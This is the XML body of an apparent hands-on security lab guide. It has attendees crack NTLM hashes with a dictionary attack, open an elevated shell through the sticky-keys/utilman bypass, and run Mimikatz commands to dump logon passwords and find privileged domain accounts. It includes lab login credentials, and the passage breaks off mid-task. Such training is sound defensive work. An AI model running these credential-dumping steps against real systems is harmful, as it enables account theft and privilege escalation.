      <w:r>
        <w:t xml:space="preserve"> account, then</w:t>
      </w:r>
      <w:r w:rsidR="0089415F">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> select “</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>dictionary attack</w:t>
      </w:r>
      <w:r>
        <w:t>” and “</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NTLM Hashes</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1570F173" w14:textId="26E380D7" w:rsidR="008700A1" w:rsidRDefault="008700A1" w:rsidP="00FF18FF">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>In dictionary Attack Window, right click in file field</w:t>
      </w:r>
      <w:r w:rsidR="0089415F">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> select “add to list”</w:t>
      </w:r>
      <w:r w:rsidR="0089415F">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and browse for file </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>D:\</w:t>
      </w:r>
      <w:r w:rsidR="00AE4D89" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>pw</w:t>
      </w:r>
      <w:r w:rsidR="00052434" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>dump6-2.0.0\</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wordlist.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (or C:\Hack\</w:t>
      </w:r>
      <w:r w:rsidR="00052434">
        <w:t>pwdump\</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Wordlist.txt if you have copied it </w:t>
      </w:r>
      <w:r w:rsidR="00F32F15">
        <w:t>locally</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on VICTIM-PC)</w:t>
      </w:r>
      <w:r w:rsidR="00F32F15">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00052434">
        <w:t xml:space="preserve"> Let dictionary attack default options.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4C162A" w14:textId="0ABA3415" w:rsidR="00F32F15" w:rsidRDefault="00F32F15" w:rsidP="00C6425D">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Complete clicking “</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5006C0DF" w14:textId="246CD0BD" w:rsidR="009B1478" w:rsidRDefault="00F32F15" w:rsidP="00FF18FF">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Let the application running until the password found or not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EBD4D2" w14:textId="7D90A498" w:rsidR="00F45770" w:rsidRDefault="00F45770"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F45770" w14:paraId="3D7D34E2" w14:textId="77777777" w:rsidTr="0013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D9663BD" w14:textId="77777777" w:rsidR="00F45770" w:rsidRDefault="00F45770" w:rsidP="0013017C">
            <w:r>
              <w:t>CHECK POINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F45770" w14:paraId="61D64815" w14:textId="77777777" w:rsidTr="0013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D56735" w14:textId="77777777" w:rsidR="00F45770" w:rsidRDefault="00F45770" w:rsidP="0013017C">
            <w:r w:rsidRPr="00F45770">
              <w:t>Look at C:\hack\pwd.txt can you see domain account listed?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FA45A04" w14:textId="77777777" w:rsidR="00F32F15" w:rsidRDefault="00F32F15" w:rsidP="0013017C">
            <w:pPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">What is the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hiddenadmin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> local account password?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B4A0608" w14:textId="01651A55" w:rsidR="002527D3" w:rsidRPr="00C6425D" w:rsidRDefault="002527D3" w:rsidP="0013017C">
            <w:pPr>
              <w:rPr>
                <w:i/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">What is the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>locadmin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> local account password?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1BA97E28" w14:textId="380C3144" w:rsidR="00F45770" w:rsidRDefault="00F45770" w:rsidP="008A26E4"/>
    <w:p w14:paraId="6D8DEEBF" w14:textId="1EAFD94A" w:rsidR="00FF18FF" w:rsidRDefault="00FF18FF" w:rsidP="00FF18FF">
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Install RSAT (Remote Server Administration Tools) using </w:t>
      </w:r>
      <w:r w:rsidR="00F26168" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>D:\</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>WindowsTH-RSAT_WS_1803-x64.msu</w:t>
      </w:r>
      <w:r>
        <w:t>. Tools will be available only after machine reboot.</w:t>
      </w:r>
      <w:r w:rsidR="00E67962">
        <w:t xml:space="preserve"> If you have message error during installation: try first to restart the computer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C640265" w14:textId="3B2D3B7C" w:rsidR="00757619" w:rsidRDefault="00757619" w:rsidP="00FF18FF">
      <w:r>
        <w:t xml:space="preserve">When install complete and system rebooted, go to </w:t>
      </w:r>
      <w:r w:rsidR="009A0494" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Control Panel\All Control Panel Items\Administrative Tools</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009A0494">
        <w:t>you should find AD consoles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790CF97D" w14:textId="62C9EA53" w:rsidR="00FF18FF" w:rsidRDefault="00FF18FF" w:rsidP="00FF18FF">
      <w:r>
        <w:t xml:space="preserve">Note if RSAT installation raise an error, check if the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF18FF">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>wuauserv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> service is up and running: this service might be disable by group policy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CACFAD" w14:textId="77777777" w:rsidR="00FF18FF" w:rsidRDefault="00FF18FF" w:rsidP="008A26E4"/>
    <w:p w14:paraId="56AA7F4D" w14:textId="77777777" w:rsidR="00A01861" w:rsidRDefault="00A01861" w:rsidP="008A26E4"/>
    <w:p w14:paraId="4137AA42" w14:textId="77777777" w:rsidR="00A01861" w:rsidRDefault="00A01861">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAE64EB" w14:textId="38D6F92B" w:rsidR="004A52D2" w:rsidRDefault="00FC1DDD" w:rsidP="00FC1DDD">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc44075682"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Task </w:t>
      </w:r>
      <w:r w:rsidR="001D46F2">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="004A52D2">
        <w:t xml:space="preserve">User </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004A52D2">
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004A52D2">
        <w:t xml:space="preserve"> to dump the credential manager</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="2A21C076" w14:textId="4B382398" w:rsidR="001776D6" w:rsidRPr="001776D6" w:rsidRDefault="001776D6" w:rsidP="001776D6">
      <w:r w:rsidRPr="006C4FF0">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">In this part attendees will use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> tool to dump logon passwords</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4FF0">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42103A47" w14:textId="514FCAA1" w:rsidR="001D59B0" w:rsidRDefault="00F018DB" w:rsidP="00FF18FF">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>From Hyper-V server</w:t>
      </w:r>
      <w:r>
        <w:t>, run mstsc.exe and connect to address 192.168.100.2</w:t>
      </w:r>
      <w:r w:rsidR="001D59B0">
        <w:t xml:space="preserve"> using this domain account:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CF27C0" w14:textId="77777777" w:rsidR="001D59B0" w:rsidRPr="001D59B0" w:rsidRDefault="001D59B0" w:rsidP="001D59B0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C6425D">
        <w:t>Domain:</w:t>
      </w:r>
      <w:r w:rsidRPr="001D59B0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> CONTOSO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D070E81" w14:textId="49D4BA1A" w:rsidR="001D59B0" w:rsidRPr="001D59B0" w:rsidRDefault="001D59B0" w:rsidP="001D59B0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C6425D">
        <w:t>Account:</w:t>
      </w:r>
      <w:r w:rsidRPr="001D59B0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> stduser1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414920A6" w14:textId="4C4F3555" w:rsidR="001D59B0" w:rsidRPr="001D59B0" w:rsidRDefault="001D59B0" w:rsidP="001D59B0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C6425D">
        <w:t>Password:</w:t>
      </w:r>
      <w:r w:rsidRPr="001D59B0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Moderate-Pwd2018!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01988CC6" w14:textId="77777777" w:rsidR="001D59B0" w:rsidRDefault="001D59B0" w:rsidP="006F3997"/>
    <w:p w14:paraId="7CE5F680" w14:textId="3FDCCF61" w:rsidR="006F3997" w:rsidRDefault="001D59B0" w:rsidP="00FF18FF">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>From VM console</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, run </w:t>
      </w:r>
      <w:r w:rsidR="006F3997">
        <w:t xml:space="preserve">elevated </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006F3997">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006F3997">
        <w:t xml:space="preserve"> (using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006F3997">
        <w:t>skicky</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006F3997">
        <w:t xml:space="preserve"> keys or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006F3997">
        <w:t>utilman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006F3997">
        <w:t>), then enter commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBD471B" w14:textId="3795DA42" w:rsidR="006F3997" w:rsidRDefault="006F3997" w:rsidP="006661D4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013017C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00F018DB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>\Hack\mimikatz_trunk\x64</w:t>
      </w:r>
      <w:r w:rsidR="00F018DB">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mimikatz.exe</w:t>
      </w:r>
      <w:r w:rsidR="00F018DB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008B5C36">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="0013017C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>rivilege::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0013017C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>debug</w:t>
      </w:r>
      <w:r w:rsidR="00F018DB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008B5C36">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="006F3997">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ekurlsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F3997">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F3997">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>logonpasswords</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F018DB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B5C36">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">exit </w:t>
      </w:r>
      <w:r w:rsidR="00F018DB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>&gt;&gt; C:\sekurlsa.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6816E1B9" w14:textId="2F9E7A42" w:rsidR="008B5C36" w:rsidRDefault="008B5C36" w:rsidP="00C6425D">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C6425D">
        <w:t xml:space="preserve">Then </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">notepad </w:t>
      </w:r>
      <w:bookmarkStart w:id="27" w:name="_Hlk533165886"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>C:\sekurlsa.log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="0594981F" w14:textId="77777777" w:rsidR="000E5D72" w:rsidRPr="006F3997" w:rsidRDefault="000E5D72" w:rsidP="000E5D72">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="527508BE" w14:textId="0AE2F55D" w:rsidR="006F3997" w:rsidRDefault="006F3997" w:rsidP="00FF18FF">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Look at the </w:t>
      </w:r>
      <w:r w:rsidR="008B5C36" w:rsidRPr="008B5C36">
        <w:t>C:\sekurlsa.log</w:t>
      </w:r>
      <w:r w:rsidR="008B5C36" w:rsidRPr="008B5C36" w:rsidDel="008B5C36">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">if there is there is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>credman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00886DF7">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00886DF7">
        <w:t>ssp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> entr</w:t>
      </w:r>
      <w:r w:rsidR="00886DF7">
        <w:t>ies</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the list:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551C58D0" w14:textId="377491C8" w:rsidR="00886DF7" w:rsidRDefault="00886DF7" w:rsidP="006F3997">
      <w:r w:rsidRPr="00886DF7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E09892A" wp14:editId="088F8411">
            <wp:extent cx="3704816"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7066" cy="4326976"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2725A5CC" w14:textId="6620AEAF" w:rsidR="006F3997" w:rsidRDefault="006F3997" w:rsidP="006F3997"/>
    <w:p w14:paraId="0EDA5F38" w14:textId="5EC24ADC" w:rsidR="0055407A" w:rsidRDefault="0055407A" w:rsidP="00FF18FF">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>You can find several accounts listed in output. Maybe there is an interesting account (member of privileged group).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6661B083" w14:textId="3FEBAD07" w:rsidR="0055407A" w:rsidRDefault="0055407A" w:rsidP="006F3997">
      <w:r>
        <w:t>To see the group membership of an account, you can use the PowerShell command “</w:t>
      </w:r>
      <w:r w:rsidRPr="001F02C1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F02C1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>aduser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F02C1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -Identity </w:t>
      </w:r>
      <w:r w:rsidR="001F02C1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>&lt;account&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="001F02C1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -Properties </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F02C1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>memberof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="001F02C1">
        <w:t>. E.g.: “</w:t>
      </w:r>
      <w:r w:rsidR="001F02C1" w:rsidRPr="00C6425D">
        <w:t>get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001F02C1" w:rsidRPr="00C6425D">
        <w:t>aduser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001F02C1" w:rsidRPr="00C6425D">
        <w:t xml:space="preserve"> -Identity </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AD1B86" w:rsidRPr="00C6425D">
        <w:t>jdoe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001F02C1" w:rsidRPr="00C6425D">
        <w:t xml:space="preserve"> -Properties </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001F02C1" w:rsidRPr="00C6425D">
        <w:t>memberof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001F02C1">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384FB328" w14:textId="182ECC93" w:rsidR="003B75F7" w:rsidRDefault="0055407A" w:rsidP="006F3997">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The purpose is to look for an account member of </w:t>
      </w:r>
      <w:r w:rsidR="00490614">
        <w:t>a d</w:t>
      </w:r>
      <w:r>
        <w:t>omain group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414659B8" w14:textId="566ACF16" w:rsidR="00992867" w:rsidRDefault="00992867"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992867" w14:paraId="104502F2" w14:textId="77777777" w:rsidTr="003C3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42ECC4C1" w14:textId="77777777" w:rsidR="00992867" w:rsidRDefault="00992867" w:rsidP="003C38D6">
            <w:r>
              <w:t>CHECK POINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00992867" w14:paraId="0AAE55B4" w14:textId="77777777" w:rsidTr="003C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28EC7CB" w14:textId="2A23137F" w:rsidR="00992867" w:rsidRDefault="002F63B1" w:rsidP="003C38D6">
            <w:bookmarkStart w:id="28" w:name="_Hlk524105932"/>
            <w:r>
              <w:t>Identify domain account and their group membership</w:t>
            </w:r>
            <w:bookmarkEnd w:id="28"/>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A939454" w14:textId="222E9F6F" w:rsidR="00992867" w:rsidRDefault="00992867" w:rsidP="00992867">
            <w:r>
              <w:t xml:space="preserve">What is the password of the domain </w:t>
            </w:r>
            <w:r w:rsidR="00FB0912">
              <w:t>accounts you can identify</w:t>
            </w:r>
            <w:r>
              <w:t>?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D1A7F2E" w14:textId="77777777" w:rsidR="00992867" w:rsidRDefault="00992867" w:rsidP="00992867"/>
    <w:p w14:paraId="0AD48F02" w14:textId="33D51B7D" w:rsidR="00A01861" w:rsidRDefault="00A01861">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C63D98" w14:textId="43BA6758" w:rsidR="00FC1DDD" w:rsidRDefault="001D46F2" w:rsidP="00FC1DDD">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc44075683"/>
      <w:r w:rsidRPr="009B5DFF">
        <w:lastRenderedPageBreak/>
        <w:t>Task 5</w:t>
      </w:r>
      <w:r w:rsidR="006F3997" w:rsidRPr="009B5DFF">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00FD5A5D">
        <w:t>identify domain account logons</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="611B6EBD" w14:textId="030BADA3" w:rsidR="001776D6" w:rsidRPr="001776D6" w:rsidRDefault="001776D6" w:rsidP="001776D6">
      <w:r w:rsidRPr="006C4FF0">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">In this part attendees will use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> to identify</w:t>
      </w:r>
      <w:r w:rsidR="002E7D8E">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> domain account and their NTLM hash or clear password</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4FF0">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539D73BE" w14:textId="58A9FD59" w:rsidR="009B5DFF" w:rsidRDefault="009B5DFF" w:rsidP="00D86DFB">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From VM console, run elevated </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>skicky</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> keys or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>utilman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>), then enter commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2032D48F" w14:textId="131C6E42" w:rsidR="009B5DFF" w:rsidRPr="009B5DFF" w:rsidRDefault="009B5DFF" w:rsidP="00416A9B">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B5DFF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Notepad c: \hack\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B5DFF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>mimikatz_trunk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B5DFF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">\x64\sniffer.bat </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6EFFD1" w14:textId="67AB5C47" w:rsidR="009B5DFF" w:rsidRDefault="009B5DFF" w:rsidP="00416A9B">
      <w:r>
        <w:t>Review commands listed in this batch</w:t>
      </w:r>
      <w:r w:rsidR="00097904">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grilledutableau"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0600" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="00097904" w14:paraId="5A5F4741" w14:textId="77777777" w:rsidTr="00097904">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
